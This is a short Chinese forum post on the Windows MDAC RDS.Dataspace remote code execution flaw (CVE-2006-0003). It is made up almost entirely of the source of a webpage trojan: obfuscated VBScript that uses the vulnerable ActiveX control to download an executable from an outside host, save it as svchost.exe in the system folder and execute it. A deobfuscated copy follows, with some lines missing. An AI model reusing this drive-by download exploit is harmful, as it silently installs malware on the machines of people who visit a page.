作者:
hcchen
Microsoft Windows MDAC 漏洞 - CVE-2006-0003:
作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
手機王網頁木馬原始碼:
[PHP]
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j1="clsid:"
j2="BD96"
j3="C556-"
j4="65A3-"
j5="11D0-"
j6="983A-"
j7="00C04FC29E36"
j8=j1&j2&j3&j4&j5&j6&j7
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
SS.type = 1
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
[/PHP]
還原:
[PHP]
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xx="object"
xxx="classid"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
strb="Microsoft.XMLHTTP"
Set x = df.CreateObject(strb,"")
strd="Adodb.Stream"
set SS = df.createobject(strd,"")
SS.type = 1
stre="GET"
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.close
zz="Shell.Application"
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
[/PHP]
書籤